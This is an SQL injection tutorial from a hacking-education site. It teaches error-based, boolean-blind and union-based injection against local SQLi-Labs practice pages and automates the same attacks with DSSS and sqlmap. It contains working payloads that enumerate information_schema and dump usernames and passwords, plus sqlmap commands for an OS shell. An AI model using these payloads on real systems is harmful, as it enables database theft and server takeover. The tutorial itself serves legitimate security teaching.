SQL Injection
Learn to perform SQLi attacks in the most effective way!
Introduction & Mindset
Hello there!
In this lecture, we are going to explore manual and automatic
ways to achieve SQL Injection (SQLi).
Picture credit: geekflare.com |
Nowadays, SQLi attacks have become rarer due to rising
awareness towards them. Happily, this does not change the fact that there
are still a lot of vulnerable web apps that can be exploited using SQLi.
practice, you'll need your own Kali Linux machine with default toolset.
Burpsuite and sqlmap are mandatory.
(It's better for you to be familiar
with these beforehand)
I'll try to make theory as detailed
as possible, but I would still encourage you to do research on your own and
read more upon completing the following tasks. This way you are more likely
to understand all the material and will be successful with continuing on
your own ;)
Unit 2 - Basics of SQL language
Important definitions
As seen from
"A database is an organized collection of data,
generally stored and accessed electronically from a computer system." There
a lot of different database types such as MySQL, PostgreSQL, and so on.
by itself is a domain-specific language used in programming for managing
databases by reading operating data.
SQL Crash Course
In order to understand SQLi, we first need to understand some basics
of the SQL language. As far, as SQLi goes, we mainly focus on getting
information from the database, this room will give you a basis for that.
In SQL, in order to choose some data, we use SELECT, FROM, and
WHERE. As you might have guessed SELECT allows us to select an object from
(FROM) database and choose a specific data using WHERE.
For example, if we have a database called colors and
we want to select all colors from the list, we would use this syntax::
SELECT * FROM colors;
Or if you have a database food with different meals
followed by calories you could choose all meals with more than 50 calories:
SELECT * FROM food WHERE calories > 50;
All in all, if you want a better understanding of SQL I
would recommend going through this
small interactive course on khanacademy.
Unit 3 - What is SQLi
A SQL injection attack consists of the injection of a SQL query to the
remote web application.
A successful SQL injection exploit can
read sensitive data from the database (usernames & passwords), modify
database data (Add/Delete), execute administration operations on the
database (such as shutdown the database), and in some cases execute commands
on the operating system.
SQLi injections put server
confidentiality under serious risk and can allow bypassing authentication
processes or even get access to high-privilege accounts.
take a look at this simple PHP input function:
If we look at the $username variable, under normal
operation we might expect the username parameter to be a real username. The
function takes a username and chooses data related to it in the users
A malicious user (hacker or pentester) might
submit some different kinds of data. For example, what happened if we input
'? (Single quote)
The application would crash because the
resulting SQL query is incorrect.
As you see here, inputted " ' " simply creates triple " ' " and produces an
error. This error can in fact output some sensitive information or simply
give a clue about database structure.
This will produce a different scenario. 1=1 is treated as true in SQL
language and therefore will return us every single row in the table.
'-- will also do a job here. This payload transforms a
username to an empty string to break out of the query and then adds a
comment (--) that hides the second single quote making the database return
data. We will discuss this more in-depth in Unit 5.
Unit 4 - How to detect SQLi?
Manual - PHP parameter
As we saw in the previous
unit, SQL injection is carried out by entering a malicious input to hijack
an SQL query. The most common example is abusing a PHP GET parameter (for
example $username, or $id) in the URL of a vulnerable web page. Those are
usually located in the search fields and login pages, so as a penetration
tester, you need to note those down.
So, now after you got
all the PHP GET parameters and login pages you can actually proceed to
detecting SQLi. Similarly to the previous unit, we want to cause a certain
error displaying at least a small error message (which can even disclose
some information, like a database type).
Let's try that by
using SQLi Labs.
so, as you can see that...browse to
As a hint, it's asking us to "Input the ID as parameter with numeric value" (exactly the PHP GET parameter we are looking for).
Giving 1 as id value outputs a standard username
and password, but that's not something we are looking for. Let's input
apostrophe instead of 1.
Vola! We were able to create an error, therefore, exposing
that the id parameter is vulnerable to SQLi! We also were able to see that
the error message exposed the database type - MySQL.
Fixing the Query
We need to now fix our query so that we can get rid of the error and
pass our malicious SQL query to the database this is done one of two ways,
either we comment out the rest of the query or we add some extra characters
to the unbalanced query to balance it out.
In our example,
we are going to comment out the rest of the query this can be done using any
of these values…
-- Double Dash
# Hash
/* */ Forward
Slash, Star,Star, Forward Slash
because we are not directly interacting
with the database and instead we are interacting with the web front end and
that front end is actually creating the query to interact with the backend
so there are some constraints.
one of the constraints is that
when we use — (double dash) to comment out the rest of the query we need to
provide an extra space after the double dash. If you don’t it will not fix
the query.
So if we go back to our SQL labs lesson 1 and just add
— to the end of our query you will see that we still get an error.
This shows that the comments have not worked
as intended, due to not having the space at the end of the double dash also
you will get the same error if you actually do a space after the double dash
because we are entering it in the URL address bar and you cant have spaces
at the end of an address. To get around this you have to URL encode the
space for it to work, this for space is %20 try this on your query and you
will notice this is now fixed.
The same goes for the
# (Hash) this will not work until you URL encode the hash and
add it to the end of your query. The #(Hash) URL
encoded is %23 and this will give you the same output as
So basically all we are doing is commenting out anything
after the single quote which closes the string then, in turn, allows us to
enter SQL commands which SQL will then run against the database.
' '1' -- ' LIMIT 0,1'
Just to recap any of the values below can be used to
comment out and fix your query.
-- Double Dash is URL encoded as --%20
--+ Injection This is the
same as above but the + on the end just means a space.
# Hash is URL
encoded as %23
-- - Double Dash space Dash SQL comment
` Backtick
Find the Number of Columns
Now we have broken the query and fixed it we are now ready to find out
how many columns the Backend database has, This is done by using the order
by statement and incrementing the number until you get an error. Start by
adding order by 1 to the query as below.
http://hackingtruth.lab/sqli/Less-1/?id=1′ order by 1–+
Keep incrementing the number after the order by statement
until you get an error
http://hackingtruth.lab/sqli/Less-1/?id=1′ order by 2–+ ( no error)
order by 3–+ (no error)
order by 4–+ (error)
Find which Columns are Vulnerable
To find which columns are vulnerable, we have to use a union all
select statement with the number of columns we found in the previous
http://hackingtruth.lab/sqli/Less-1/?id=1' union all select
Notice nothing really changes on our test lab as we need
to make the statement false to find the vulnerable columns, to do this we
have to write something after the = sign which is not in our database
http://hackingtruth.lab/sqli/Less-1/?id=–1′ union all select
http://hackingtruth.lab/sqli/Less-1/?id=.1' union all select
union all select 1,2,3--+
union all select 1,2,3--+
As you can see you can write anything after the = sign to get
the same result as long as it’s not in the database.
Let’s just
make sure these columns are vulnerable by adding some extra characters this
shows that we are able to manipulate what these columns display.
http://hackingtruth.lab/sqli/Less-1/?id=-1' union all select
Find SQL Version & Database Name
We can now use our vulnerable columns to find out some juicy
information like which Version of SQL the server is running and the name of
the database
To find out the SQL version, we just need to add
version() to one of the vulnerable columns like this…
http://hackingtruth.lab/sqli/Less-1/?id=-lol-1′ union all select
This tells us we are running
SQL 5.7.15 and Ubuntu which, if you
followed my tutorial on setting up a vulnerable LAMP server we know in my
SQL Labs that I have installed Linux Mint which is based on ubuntu.
reason we need to know the version of SQL is that SQL version 4 is very
different in the way you do SQL Injections compared to SQL
Version 5. In SQL version 4 you have to guess the table
names compared to Version 5 where you manipulate the INFORMATION_SCHEMA to
spit out the names of the tables.
Next to find out the name of
the database add database() to the either of the two columns.
http://hackingtruth.lab/sqli/Less-1/?id=-1' union all select
As you can see, I have used column 3 which now displays the name of the
database as security.
Finding Tables
Now its time to display what tables are in our database called
Security. We do this by adding a group_concat command in one of the
vulnerable columns that query’s the information _schema and spits out the
table names on the website.
http://hackingtruth.lab/sqli/Less-1/?id=-1' union all select
1,group_concat(table_name),3 from information_schema.tables where
After you get the names of the tables, it’s time to start
extracting the data from these tables. In this example, we will go after the
users table as this is where you usually find all the juicy usernames and
Extract the columns
We extract the columns by adding column_name in between the brackets
of our group_concat command and changing the information_schema to look at
the columns.
http://hackingtruth.lab/sqli/Less-1/?id=-1' union all select
1,group_concat(column_name),3 from information_schema.columns where
Dumping Columns
Now we select what columns we want to dump from our table. For this
example, I’m looking for the id, username and password columns from
the users table. To do this we add id,username,password inside the brackets
of our group_concat command, then tell it which table we want to dump the
data from.
http://hackingtruth.lab/sqli/Less-1/?id=-1' union all select
1,group_concat(id,username,password),3 from users--+
So this displays all the usernames and passwords from the users table, the problem is this is not very easy to read.
Formatting the Output
We can make this more pleasing to read by adding HEX encoded
characters and HTML tags to our query.
The easiest way to do this
is by using the HEX Encoding function in the
Hackbar firefox addon.
So say we want to add colons : between our id, username
and password. First open up the Hackbar (F9 if you have it installed but it
is not showing) type a : (colon) into the hackbar, highlight it and select
Encoding -->HEX Encoding --> String to 00ff00ff
This will convert the colon : into a 3a, then add 0x to the
front of this and it now can be added to our query like below… Which will
add a colon between each username and password it displays .
http://hackingtruth.lab/sqli/Less-1/?id=-1' union all select
1,group_concat(id,username,0x3a,password),3 from users--+
Also try adding a double colon :: after the id in our
query. A double colon encodes to 3a3a using the Hackbar, add 0x to the front
of that and we get 0x3a3a which we can add after id
http://hackingtruth.lab/sqli/Less-1/?id=-1' union all select
1,group_concat(id,0x3a3a,username,0x3a,password),3 from users--+
0x3a = :
0x3a3a= ::
you can also encode HTML tags to format the text, in this
example I will use a line break <br> to list the output with one line
for each record.
<br> HTML tag encodes with the hackbar to
3c62723e add 0x to the front of this to get 0x3c62723e and add it
before the id in our query.
http://hackingtruth.lab/sqli-labs/Less-1/index.php?id=' union all select
1,group_concat(0x3c62723e,id,0x3a3a,username,0x3a,password),3 from
<br> = 0x3c62723e (a line break)
You can even encode a string using this same process for example
HempsTutorials encodes to
48656d70735475746f7269616c7320 add
0x to the front of this and add
to the other vulnerable column we are not using. which once processed will
display HempsTutorials in our output.
http://hackingtruth.lab/sqli-labs/Less-1/index.php?id=-1' union all
select 1,group_concat(0x3c62723e,id,0x3a3a,username,0x3a,password),
0x48656d70735475746f7269616c7320 from users--+
Automatic - Damn Small SQLi Scanner
Quick install: git clone https://github.com/stamparm/DSSS.git
&& cd DSSS/
Damn Small SQLi Scanner is an awesome
little python script that allows us to check for SQLi vulnerability. Simply
provide it with a link to the PHP parameter to run it.
Main syntax: python3 dsss.py -u "LINK"
try it on our SQLi labs!
Simply run the script against
hackingtruth.lab/sqli-labs/Less-1/index.php?id= and see what happens.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/hackingtruth.lab] └─$ ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/hackingtruth.lab] └─$ git clone https://github.com/stamparm/DSSS.git && cd DSSS/ Cloning into 'DSSS'... remote: Enumerating objects: 366, done. remote: Counting objects: 100% (9/9), done. remote: Compressing objects: 100% (7/7), done. remote: Total 366 (delta 2), reused 8 (delta 2), pack-reused 357 Receiving objects: 100% (366/366), 66.01 KiB | 472.00 KiB/s, done. Resolving deltas: 100% (120/120), done. ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/hackingtruth.lab/DSSS] └─$
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/hackingtruth.lab/DSSS] └─$ python3 dsss.py -u "http://hackingtruth.lab/sqli-labs/Less-1/index.php?id=" 130 ⨯ Damn Small SQLi Scanner (DSSS) < 100 LoC (Lines of Code) #v0.3b by: Miroslav Stampar (@stamparm) * scanning GET parameter 'id' (i) GET parameter 'id' appears to be error SQLi vulnerable (MySQL) (i) GET parameter 'id' appears to be blind SQLi vulnerable (e.g.: 'http://hackingtruth.lab/sqli-labs/Less-1/index.php?id=1%27%20AND%2070%3D70--%20-') scan results: possible vulnerabilities found ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/hackingtruth.lab/DSSS] └─$
Oh wow! It did not only detect the vulnerability but
provided us with the database type and suggested possible exploitation
That is definitely a good tool and I highly recommend using
Automatic - suIP.biz
This is an online sqlmap powered tool that allows
you to perform a fast SQLi check. Unfortunately, we cannot run it against
our machine but this tool can be really handy in the real-world tests
If really want to test this (or some other SQLi tools) with SQLi labs, it is
possible to host the labs on Heroku or any other server
provider (find an installation link in Unit 9).
Unit 5 - Error Based SQLi
Error-based SQLi is a SQL Injection
technique that relies on error messages which are used to retrieve any
sensitive information. In some cases, error-based SQL injection alone is
enough for an attacker to enumerate an entire database.
So, as seen from the definition, we actually want to create a
SQL error, displaying some sensitive content. As you might have seen in Unit
4, we were able to get the database type by creating an error. Now we need
to go beyond that and get something more interesting.
Of course,
to make your life easier, at this point you would actually fuzz the SQL
vulnerable link with a wordlist and most likely get the desired result. But
for the purpose of this room, we are going to actually see how manually
develop the payload using the understanding of SQL language. I have linked
some useful payload lists and blogs in Unit 9 so you can practice
Manual exploitation - SQLi Labs Lesson 1
to lesson 1 on the sqli labs machine and include the id=1 parameter just
like we did in the previous unit.
When we put the id parameter as some value, we instantly get a
Login name and password. Let's think of that in terms of SQL language.
id parameter is attached to a certain username (login name) and password
which are being chosen from the database.
This how it
would look in terms of SQL language:
select login_name, password from table where id=
See, just by looking at the basic output, we were
able to retrieve some common SQL patterns. Now, as a part of error-based
SQLi, we can exploit it.
Note here: Try inputting
something other than numbers and see what happens. Also, try inputting some
big numbers. Think about it and ask yourself if it tells us about
Now try inputting 1' as the id parameter and let's
analyze the error closely.
syntax to use near ''1'' LIMIT 0,1' at line 1
We can see that the web app is producing an error due to four
single quotes around the 1
As in Unit 3, we can understand that error as 'one extra' single quote
which cannot be recognized by the system.
do I mean by that? Well, in this case when the application is taking the id
input, it is putting it between two single quotes like so:
' 1 '
But when we input 1' we produce this scenario:
' 1' '
We are, in a way, closing the first single quote, at the same
time creating the third. This, later on, makes the system automatically
close the third one, displaying syntax to use near ''1''error.
you are still a bit confused about this, let's take a bit different
Try inputting 1\ as the id value. This also produces an error
with '1\', clearly showing that the id value is placed between single
What we can do about it?
Well, if we can close the
single quotes that easily, it means that we are able to break out of the
query and provide custom commands.
If you try putting AND 1=1
(which corresponds to true) after the single quote, we still get this
In order to get around that, we need to fix the query back. It's done by
commenting out the rest by using -- and providing + as the blank space at
the end.
The URI should look like this
hackingtruth.lab/sqli-labs/Less-1/index.php?id=1' AND 1=1 --+
Wonderful! The web application is displaying us content
even though we injected some custom SQL code which should not be available
for us.
So, to sum up, in error-based SQLi injection, we first,
need to find a link or input form where we can create an error. Then, by
inputting random things like single and double quotes, slashes, and
backslashes we need to understand the common pattern and figure out the
basic structure of SQL query. After that simply abuse your acquired
knowledge to exploit the app and get what you wanted.
A small payload collection can be found here:
Unit 6 - Boolean based SQLi
Boolean-based SQL Injection relies on
sending an SQL query to the database which forces the application to return
a different result depending on whether the query gave a TRUE or FALSE
result. Depending on the result, the content of the HTTP response will
change, or remain the same (Change in HTTP response usually stands for a
FALSE response, while TRUE does not affect anything). This allows an
attacker to understand if the payload used returned true or false, even
though no data from the database is returned.
The boolean based sqli is usually carried out in a blind
situation. Blind, in this case, means that there's no actual output and that
we cannot see any error message (like we did previously).
Blind query breaking - SQLi Labs Lesson 8
Browse to and let's
take a look.
Inputting single or a double quote doesn't produce any
result, same as slashes. This gives us the idea of the blindness of our sql
injection (or even absence of vulnerability at all). In this situation,
we'll have to practically guess the query and exploit the database right
Make the id parameter equal to 1. We now see a
You are in...........
Now, let's
blindly assume that the same as in the previous unit, putting 1' as the id
value would produce some error.
And it did! We didn't see the error message but the
message disappeared meaning that we were actually able to produce some sort
of error. Now, fix the query by putting --+
hackingtruth.lab/sqli-labs/Less-8/?id=1' --+
Wonderful! The message is back. See what happened here,
even though we are not able to see any SQL output, by making some simple
assumption we were able to find a similar pattern as in the previous
But the difference is that boolean sqli relies on the
concept of True-False relation. Let's see how it works here.
Put OR 1 in the link like so:' OR 1
--+, representing the True value.
We still see the message.
Putting OR 0 won't logically display the message directly proving our
ability to perform an SQL injection attack
Well, now as we can only return True (You are in...........) or False
(no message) statements, we need to start playing the game of yes-no with
the database. By asking 'questions' about the database length and table
quantity we can dump and enumerate the database.
At this
point, it is important to understand that in SQL language we can actually
use =, <, > to compare the values.
Try putting
different comparison values in your link
hackingtruth.lab/sqli-labs/Less-8/?id=1' OR 1 < 2 --+ = True
hackingtruth.lab/sqli-labs/Less-8/?id=1' OR 1 > 2 --+ = False
This comparison can be actually helpful for us in asking those
For this particular room let's try to
get the database's name using blind sql injection.
In sql
language, there's a really useful function called SUBSTR() which extracts a
substring from a string (starting at any position).
It takes 3 input
1. Operated text (in our case database name)
2. Character
to start with
3. Number of characters to extract
example, running
SELECT SUBSTR("Strange Fox", 5, 3) will return us nge.
Then, our SQLi payload would look like
AND (substr((select database()),1,1)) - this
will return us the first character of the database name.
Now, what we need to do is literally guess the
character by trying to compare that payload to some letters.
the payload would look like that
1' substr((select database()),1,1)) = s --+
Happily for us, there's a way to avoid using
characters and actually speed things up (instead of fuzzing the whole
alphabet). If we add ascii() function before the payload, we'll be able to
compare it to ascii character values.
hackingtruth.lab/sqli-labs/Less-8/?id=1' AND (ascii(substr((select
database()),1,1))) = 115 --+
This will once again return us You are
in........... because s letter corresponds to
115 in ASCII.
Of course, in the real world we cannot
simply guess that so we need to use > and < operators to
compare the value of the characters to their ASCII values.
Now try guessing the second letter using the
comparison technique.
hackingtruth.lab/sqli-labs/Less-8/?id=1' AND (ascii(substr((select
database()),2,1))) < 115 --+
Unit 7 - Union Based SQLi
Union-based SQLi is a SQL injection technique that leverages
the UNION SQL operator to combine the results of two or more SELECT
statements into a single result which is then returned as part of the HTTP
The UNION keyword
lets you execute one or more additional SELECT queries and append the
results to the original query. For example:
SELECT 1, 2 FROM usernames UNION SELECT 1, 2 FROM passwords
This SQL query will return a single result taken from 2
columns: first and second positions from usernames and passwords.
UNION SQLi attack consists of 3 stages:
1. You need to determine the number of columns you can
2. You make sure that the columns you found are in a suitable
3. Attack and get some interesting data.
Determining the number of columns required in an SQL injection UNION
There are exactly two ways to detect one:
The first
one involves injecting a series of ORDER BY queries until an error occurs.
For example:
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
# and
so on until an error occurs
(The last value before the error would indicate the
number of columns.)
The second one (most effective in
my opinion), would involve submitting a series of UNION SELECT payloads with
a number of NULL values:
# until the error occurs
No error = number of NULL matches the number of
> Finding columns with a useful data type in an
SQL injection UNION attack
Generally, the interesting data
that you want to retrieve will be in string form. Having already determined
the number of required columns, (for example 4) you can probe each column to
test whether it can hold string data by replacing one of the UNION SELECT
payloads with a string value. In case of 4 you would submit:
No error = data type is useful for us (string).
Using an SQL injection UNION attack to retrieve interesting data
you have determined the number of columns and found which columns can hold
string data, you can finally start retrieving interesting data.
* The first two steps showed exactly two existing columns with the useful
* The database contains a table called users with the
columns username and password.
(This can be
figured out by using the boolean technique from Unit 6)
In this situation, you can retrieve the contents of the user's
table by submitting the input:
' UNION SELECT username, password FROM users --
First, i browse to hackintruth.lab:3000/resetdb.php to set up the
Then, go to
hackingtruth.lab:3000/register.php and register a new account. Make sure you
input something interesting, as you'll be able to interact with that data
later on! (Question 4)
Now let's proceed to the main
objective - exploiting the web app. A vulnerable search field is located
Let's start our exploitation process!
As you
might remember, we, first, need to determine the number of available columns
by inputting a series of
' UNION SELECT NULL -- into the search
To spice things up, I've configured the database to
also throw an error when having a -- at the end. To bypass that, we need to
include an additional comment after the --. You can use either // or /* do
bypass that configuration.
As you can see on the screenshot above, a single NULL
value causes an error, meaning that there are more columns. Try inputting
NULL values until you finally get the number. Note it down to answer the
questions later on.
Now, try inputting 'a' instead of random
NULL values and see if there's an error. An error will indicate that the
given column format is not suitable for us and cannot be exploited.
NULL,NULL,NULL,'a' -- //
Finally, we can start getting some valuable
information. Simply replace some null values with SQL keywords to get
information about the database.
Here's a small list of thing you'd want
to retrieve:
1. database()
2. user()
3. @@version
5. password
6. table_name
7. column_name
Let's try this
1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from
user-- -
' UNION SELECT * FROM users -- //
Now, next step is to extract some more information from
the database, and Union query is a great way of doing that.
which gives me no. of exact columns. As we can see, the
no. of NULLs above is 8 so the table has 8 nos of columns. Anything less
than 8 don't produce any error and anything above than 8 produces error. So,
that way we can determine that the no. of columns are 8. Another way of
doing that is executing ' ORDER BY query.
Start by 'ORDER
BY 1 till you get error and the no. before you get error is no. of the
columns. So, supplying 'ORDER BY 9 gave error, so the no. is 8.
Next step is to know the datatype of the columns.
The query
which gives me error as 'conversion failed....data type
int' so the first column is int. Similarly we can keep trying to replace
each NULL in above query to know the datatypes of each column. Another
doesn't produce any error, so string datatype, so- forth,
Now more queries can be executed:
/*version info*/
/*version info*/
/*version info*/
' union select null, id, username, password, fname from users -- //
Automating exploitation
Project link:
sqlmap is an open-source penetration testing tool that
automates the process of detecting and exploiting SQL injection flaws and
taking over of database servers. It comes with a powerful detection engine,
many niche features for the ultimate penetration tester and a broad range of
switches lasting from database fingerprinting, over data fetching from the
database, to accessing the underlying file system and executing commands on
the operating system via out-of-band connections.
sqlmap is
truly an awesome tool that can be extremely handy for us. Even though it is
not allowed to use it during the OSCP exam, nothing restricts us from using
it for our pen-tests and tryhackme rooms.
Quick install:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git
Print out the help page by running sqlmap --help and can take a
closer look.
Table of the most important switches
Settings | Enumeration | OS interaction | Additional |
--url (-u) Set the target URL |
--dump --dump-all Dump (retrieve) DBMS database |
--os-shell Prompt for an interactive operating system shell |
--batch Never ask for user input, use the default behavior |
--dbms Provide back-end DBMS to exploit (i.e MySQL, PostgreSQL) |
--passwords Enumerate DBMS users password hashes |
--os-pwn Prompt for an OOB shell, Meterpreter or VNC |
--wizard Simple wizard interface for beginner users |
--level=LEVEL Level of tests to perform (1-5) --risk=RISK Risk of tests to perform (1-3) |
--all Retrieve everything |
Command examples:
All-in-one cheat sheet:
Now, when we are a bit more familiar with sqlmap
let's practice using it.
Go back to sqli labs lesson 1 and input the
link to sqlmap.
sqlmap --url "hackingtruth.lab/sqli-labs/Less-1/index.php?id=" --batch
Oh wow! sqlmap has fetched all information for us! DB type, possible
injection type, and even got us OS information.
Now go ahead and
play around with the tool, try dumping the database, or simply enumerating
Burpsuite + sqlmap
has a really awesome feature that allows us to automatically process and
exploit requests taken from Burpsuite.
Go ahead and configure
burp suite to work properly. (If you are not sure how to use Burpsuite, take
a step back and see this article )
Check that you have caught a request similar to the
screenshot above.
Right-click on the request and choose 'Save item'.
Now when we have a saved request let's go ahead and connect sqlmap here.
to the request location (where you saved it) and open up a terminal.
sqlmap -r {request} --batch (replace {request} with your file name).
We got the same output as before! See how easy it actually
As a piece of advice, I'd definitely use the request feature when
SQL injecting login pages as sqlmap automatically check all possible
parameters (username, password).
1) How would you get an OS shell on website "hackingtruth.lab/login.php"?
(URL switch comes first)
Ans :- sqlmap -u "sqli.thm/login.php" --os-shell
2) What about listing all databases on the same website? (URL
switch comes first)
Ans :- sqlmap -u "sqli.thm/login.php" --dbs
All-in-one cheat sheet:
Unit 9 - Resources & What's next?
Congratulations! we have successfully gone through the
major part of SQLi. Now, with all that knowledge it won't take long for you
to pick up on small tricks and tactics by reading and researching more. I
have attached a some further SQLi resources for you to explore. Enjoy!
Good luck with your studies!
Payload Lists:
Guides & Blogs:
(Special thanks to TheMayor for linking the last one)
Labs and practice:
This was written for educational purpose and pentest only.
The author
will not be responsible for any damage ..!
The author of this tool is
not responsible for any misuse of the information.
You will not misuse
the information to gain unauthorized access.
This information shall
only be used to expand knowledge and not for causing malicious or
damaging attacks. Performing any hacks without written permission is illegal
All video’s and tutorials are for informational and
educational purposes only. We believe that ethical hacking, information
security and cyber security should be familiar subjects to anyone using
digital information and computers. We believe that it is impossible to
defend yourself from hackers without knowing how hacking is done. The
tutorials and videos provided on www.hackingtruth.in is only for those who
are interested to learn about Ethical Hacking, Security, Penetration Testing
and malware analysis. Hacking tutorials is against misuse of the information
and we strongly suggest against it. Please regard the word hacking as
ethical hacking or penetration testing every time this word is used.
tutorials and videos have been made using our own routers, servers, websites
and other resources, they do not contain any illegal activity. We do not
promote, encourage, support or excite any illegal activity or hacking
without written permission in general. We want to raise security awareness
and inform our readers on how to prevent themselves from being a victim of
hackers. If you plan to use the information for illegal purposes, please
leave this website now. We cannot be held responsible for any misuse of the
given information.
- Hacking Truth by Kumar Atul
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